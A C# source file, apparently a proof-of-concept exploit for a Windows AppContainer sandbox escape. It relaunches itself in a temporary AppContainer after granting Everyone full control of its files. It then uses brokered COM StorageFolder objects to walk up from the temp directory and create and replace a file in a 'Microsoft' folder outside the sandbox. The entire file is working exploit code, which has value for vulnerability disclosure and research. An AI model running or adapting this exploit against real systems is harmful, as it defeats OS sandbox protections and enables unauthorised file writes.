﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;

namespace POC
{
    class Program
    {
        enum EOLE_AUTHENTICATION_CAPABILITIES
        {
            EOAC_NONE = 0,
            EOAC_MUTUAL_AUTH = 0x1,
            EOAC_STATIC_CLOAKING = 0x20,
            EOAC_DYNAMIC_CLOAKING = 0x40,
            EOAC_ANY_AUTHORITY = 0x80,
            EOAC_MAKE_FULLSIC = 0x100,
            EOAC_DEFAULT = 0x800,
            EOAC_SECURE_REFS = 0x2,
            EOAC_ACCESS_CONTROL = 0x4,
            EOAC_APPID = 0x8,
            EOAC_DYNAMIC = 0x10,
            EOAC_REQUIRE_FULLSIC = 0x200,
            EOAC_AUTO_IMPERSONATE = 0x400,
            EOAC_NO_CUSTOM_MARSHAL = 0x2000,
            EOAC_DISABLE_AAA = 0x1000
        }

        enum AuthnLevel
        {
            RPC_C_AUTHN_LEVEL_DEFAULT = 0,
            RPC_C_AUTHN_LEVEL_NONE = 1,
            RPC_C_AUTHN_LEVEL_CONNECT = 2,
            RPC_C_AUTHN_LEVEL_CALL = 3,
            RPC_C_AUTHN_LEVEL_PKT = 4,
            RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5,
            RPC_C_AUTHN_LEVEL_PKT_PRIVACY = 6
        }

        enum ImpLevel
        {
            RPC_C_IMP_LEVEL_DEFAULT = 0,
            RPC_C_IMP_LEVEL_ANONYMOUS = 1,
            RPC_C_IMP_LEVEL_IDENTIFY = 2,
            RPC_C_IMP_LEVEL_IMPERSONATE = 3,
            RPC_C_IMP_LEVEL_DELEGATE = 4,
        }

        [DllImport("ole32.dll")]
        static extern int CoInitializeSecurity(
            IntPtr pSecDesc,
            int cAuthSvc,
            IntPtr asAuthSvc,
            IntPtr pReserved1,
            AuthnLevel dwAuthnLevel,
            ImpLevel dwImpLevel,
            IntPtr pAuthList,
            EOLE_AUTHENTICATION_CAPABILITIES dwCapabilities,
            IntPtr pReserved3
        );

        // Run here to ensure it's called before the main thread.
        static readonly int _security_init = CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
                ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,
                EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING, IntPtr.Zero);
        public enum CLSCTX : uint
        {
            INPROC_SERVER = 0x1,
            INPROC_HANDLER = 0x2,
            LOCAL_SERVER = 0x4,
            INPROC_SERVER16 = 0x8,
            REMOTE_SERVER = 0x10,
            INPROC_HANDLER16 = 0x20,
            RESERVED1 = 0x40,
            RESERVED2 = 0x80,
            RESERVED3 = 0x100,
            RESERVED4 = 0x200,
            NO_CODE_DOWNLOAD = 0x400,
            RESERVED5 = 0x800,
            NO_CUSTOM_MARSHAL = 0x1000,
            ENABLE_CODE_DOWNLOAD = 0x2000,
            NO_FAILURE_LOG = 0x4000,
            DISABLE_AAA = 0x8000,
            ENABLE_AAA = 0x10000,
            FROM_DEFAULT_CONTEXT = 0x20000,
            ACTIVATE_32_BIT_SERVER = 0x40000,
            ACTIVATE_64_BIT_SERVER = 0x80000,
            ENABLE_CLOAKING = 0x100000,
            APPCONTAINER = 0x400000,
            ACTIVATE_AAA_AS_IU = 0x800000,
            ACTIVATE_NATIVE_SERVER = 0x1000000,
            ACTIVATE_ARM32_SERVER = 0x2000000,
            PS_DLL = 0x80000000,
            SERVER = INPROC_SERVER | LOCAL_SERVER | REMOTE_SERVER,
            ALL = INPROC_SERVER | INPROC_HANDLER | LOCAL_SERVER | REMOTE_SERVER
        }

        [Flags]
        public enum REGCLS
        {
            SINGLEUSE = 0,
            MULTIPLEUSE = 1,
            MULTI_SEPARATE = 2,
            SUSPENDED = 4,
            SURROGATE = 8,
            AGILE = 0x10,
        }

        [DllImport("ole32.dll", PreserveSig = false)]
        static extern int CoRegisterClassObject(ref Guid rclsid, IClassFactory pUnk, CLSCTX dwClsContext, REGCLS flags);

        static Guid IID_IUnknown = new Guid("00000000-0000-0000-c000-000000000046");

        [DllImport("combase.dll", CharSet = CharSet.Unicode, PreserveSig = false)]
        [return: MarshalAs(UnmanagedType.IInspectable)]
        static extern object RoActivateInstance(
            [MarshalAs(UnmanagedType.HString)] string activatableClassId);

        [DllImport("combase.dll", CharSet = CharSet.Unicode, PreserveSig = false)]
        [return: MarshalAs(UnmanagedType.IInspectable)]
        static extern object RoGetActivationFactory(
            [MarshalAs(UnmanagedType.HString)] string activatableClassId,
            in Guid iid);

        static IStorageFolder GetFolder(IAsyncOperation_StorageFolder r)
        {
            IAsyncInfo info = (IAsyncInfo)r;
            while (info.get_Status() != AsyncStatus.Completed)
            {
                var s = info.get_Status();
                if (s == AsyncStatus.Error || s == AsyncStatus.Canceled)
                {
                    throw new Win32Exception(info.get_Error());
                }
            }
            r.GetResults();
            return (IStorageFolder)Marshaled.Obj;
        }

        static IStorageFile GetFile(IAsyncOperation_StorageFile r)
        {
            IAsyncInfo info = (IAsyncInfo)r;
            while (info.get_Status() != AsyncStatus.Completed)
            {
                var s = info.get_Status();
                if (s == AsyncStatus.Error || s == AsyncStatus.Canceled)
                {
                    throw new Win32Exception(info.get_Error());
                }
            }
            r.GetResults();
            return (IStorageFile)Marshaled.Obj;
        }

        static IStorageFolder GetParent(IStorageFolder folder)
        {
            var item = (IStorageItem2)folder;
            return GetFolder(item.GetParentAsync());
        }

        static string GetPath(IStorageFolder folder)
        {
            return ((IStorageItem)folder).get_Path();
        }

        static string GetPath(IStorageFile file)
        {
            return ((IStorageItem)file).get_Path();
        }

        static void RunTest()
        {
            Guid clsid = new Guid("a5183349-82de-4bfc-9c13-7d9dc578729c");
            Console.WriteLine("Cookie: {0}", CoRegisterClassObject(
                ref clsid, new ClassFactory<Marshaled>(),
                CLSCTX.LOCAL_SERVER, REGCLS.MULTIPLEUSE));

            clsid = new Guid("be88f957-42cc-4da7-92cf-9bc35c5d5ee2");
            Console.WriteLine("Cookie: {0}", CoRegisterClassObject(
                ref clsid, new ClassFactory<Marshaled>(),
                CLSCTX.LOCAL_SERVER, REGCLS.MULTIPLEUSE));

            IStorageFolderStatics statics = (IStorageFolderStatics)RoGetActivationFactory("Windows.Storage.StorageFolderStaticsBrokered", IID_IUnknown);
            Console.WriteLine("Broker PID: {0}", MarshalToObjRef(statics).ProcessId);
            var res = GetFolder(statics.GetFolderFromPathAsync(Path.GetTempPath()));
            Console.WriteLine("{0} {1}", MarshalToObjRef(Marshaled.Obj).ApartmentName, MarshalToObjRef(Marshaled.Obj2).ApartmentName);
            Console.WriteLine("Res: {0}", res);
            Console.WriteLine(GetPath(res));

            string path = Path.GetTempFileName();
            File.WriteAllText(path, "Hello World!");
            
            var file = GetFile(res.GetFileAsync(Path.GetFileName(path)));
            Console.WriteLine(GetPath(file));

            res = GetParent(res);
            Console.WriteLine(GetPath(res));
            res = GetParent(res);
            Console.WriteLine(GetPath(res));
            res = GetParent(res);
            Console.WriteLine(GetPath(res));
            res = GetParent(res);
            Console.WriteLine(GetPath(res));
            res = GetParent(res);
            Console.WriteLine(GetPath(res));
            res = GetFolder(res.GetFolderAsync(@"Microsoft"));
            Console.WriteLine(GetPath(res));
            var f = GetFile(res.CreateFileAsync("abc.txt", CreationCollisionOption.ReplaceExisting));
            file.MoveAndReplaceAsync(f);
            Console.WriteLine(f);
            Console.WriteLine(GetPath(f));
        }

        [DllImport("ole32.dll", CharSet = CharSet.Unicode, PreserveSig = false)]
        private static extern IMoniker CreateObjrefMoniker(IntPtr pUnk);

        [DllImport("ole32.dll", CharSet = CharSet.Unicode)]
        private static extern int CreateBindCtx(uint Reserved, out IBindCtx ppbc);

        private static COMObjRefStandard MarshalToObjRef(object obj)
        {
            string objref = MarshalObjectToString(obj);
            byte[] data = Convert.FromBase64String(objref.Split(':')[1]);
            return (COMObjRefStandard)COMObjRef.FromArray(data);
        }

        private static string MarshalObjectToString(IntPtr obj)
        {
            IMoniker moniker = CreateObjrefMoniker(obj);
            moniker.GetDisplayName(null, null, out string displayName);
            return displayName;
        }

        private static string MarshalObjectToString(object obj)
        {
            return MarshalObjectToString(Marshal.GetIUnknownForObject(obj));
        }

        static bool IsAppContainer()
        {
            using (var token = NtToken.OpenProcessToken())
            {
                return token.AppContainer;
            }
        }

        static void FixPermissions()
        {
            string dir = Path.GetDirectoryName(typeof(Program).Assembly.Location);
            foreach (var file in Directory.GetFiles(dir))
            {
                try
                {
                    using (var obj = NtFile.Open(NtFileUtils.DosFileNameToNt(file), null, FileAccessRights.WriteDac))
                    {
                        obj.SetSecurityDescriptor(new SecurityDescriptor("D:(A;;GA;;;WD)(A;;GA;;;AC)"), SecurityInformation.Dacl);
                    }
                }
                catch (Exception ex)
                {
                    Console.WriteLine("Failed to set security for {0} - {1}", file, ex.Message);
                }
            }
        }

        static void CreateSandboxProcess()
        {
            using (var profile = AppContainerProfile.CreateTemporary())
            {
                string cmdline = "Program";

                Win32ProcessConfig config = new Win32ProcessConfig
                {
                    ApplicationName = typeof(Program).Assembly.Location,
                    CommandLine = cmdline,
                    TerminateOnDispose = true
                };
                config.AppContainerSid = profile.Sid;
                using (var p = Win32Process.CreateProcess(config))
                {
                    p.Process.Wait();
                }
                Console.WriteLine("Finished");
            }
        }

        [MTAThread]
        static void Main(string[] args)
        {
            try
            {
                var opts = (IGlobalOptions)new GlobalOptions();
                opts.Set(GLOBALOPT_PROPERTIES.COMGLB_UNMARSHALING_POLICY, 
                    new IntPtr((int)GLOBALOPT_UNMARSHALING_POLICY_VALUES.COMGLB_UNMARSHALING_POLICY_STRONG));
                Console.WriteLine("In Process {0}", Process.GetCurrentProcess().Id);
                
                if (IsAppContainer())
                {
                    Console.WriteLine("In AppContainer");
                    RunTest();
                }
                else
                {
                    FixPermissions();
                    CreateSandboxProcess();
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
                Console.ReadLine();
            }
        }
    }
}
